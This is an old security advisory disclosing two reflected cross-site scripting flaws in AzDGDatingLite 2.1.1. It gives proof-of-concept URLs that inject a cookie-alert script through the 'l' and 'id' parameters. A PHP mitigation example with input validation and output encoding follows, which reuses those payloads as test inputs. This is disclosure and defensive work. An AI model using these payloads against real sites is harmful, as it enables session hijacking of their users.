{================================================================================}
{                              [waraxe-2004-SA#014]                              }
{================================================================================}
{                                                                                }
{               [ Cross-Site Scripting aka XSS in AzDGDatingLite ]               }
{                                                                                }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=14


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AzDGDatingLite: Version 2.1.1 (probably older versions are affected too)
Written by: AzDG (support@azdg.com)
Homepage: http://www.azdg.com


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Cross-Site Scripting in language variable:

http://localhost/azdlite/index.php?l=en"><script>alert(document.cookie);</script>

2. Cross-Site Scripting in view.php:

http://localhost/azdlite/view.php?l=&id=00001<script>alert(document.cookie);</script>


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------
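
Mitigation sketch for the two parameters named above (`l` and `id`). This is an added example, not code from AzDGDatingLite or from the advisory's author. The language allowlist, the digits-only id format and every function name are assumptions chosen for illustration.

```php
<?php
// Added example: validate `l` and `id` on input, encode on output.
// ALLOWED_LANGS and the 1-10 digit id rule are assumptions, not taken
// from the AzDGDatingLite source.
const ALLOWED_LANGS = ['en', 'ru', 'de'];

function clean_lang($raw, string $default = 'en'): string
{
    // Strict allowlist; arrays (l[]=x) and unknown values fall back.
    return (is_string($raw) && in_array($raw, ALLOWED_LANGS, true)) ? $raw : $default;
}

function clean_id($raw): ?string
{
    // \A ... \z anchors the whole string, so trailing markup is rejected.
    return (is_string($raw) && preg_match('/\A[0-9]{1,10}\z/', $raw) === 1) ? $raw : null;
}

function e(string $s): string
{
    // Encode for HTML text and quoted attribute contexts.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function profile_link(array $query): string
{
    $lang = clean_lang($query['l'] ?? null);
    $id   = clean_id($query['id'] ?? null);
    if ($id === null) {
        return '<p>Invalid profile id.</p>';
    }
    // Build the URL from validated values, then encode it for the attribute.
    $href = 'view.php?' . http_build_query(['l' => $lang, 'id' => $id]);
    return '<a href="' . e($href) . '">Profile ' . e($id) . '</a>';
}

// Constructed inputs mirroring the two request shapes in the advisory,
// plus one well-formed request.
$samples = [
    ['l' => 'en"><script>alert(document.cookie);</script>', 'id' => '00001'],
    ['l' => '', 'id' => '00001<script>alert(document.cookie);</script>'],
    ['l' => 'en', 'id' => '00001'],
];
foreach ($samples as $q) {
    echo profile_link($q), PHP_EOL;
}
```

Validation alone is not sufficient if other code paths echo request data, so the `e()` call stays on every value written into HTML even after the allowlist check.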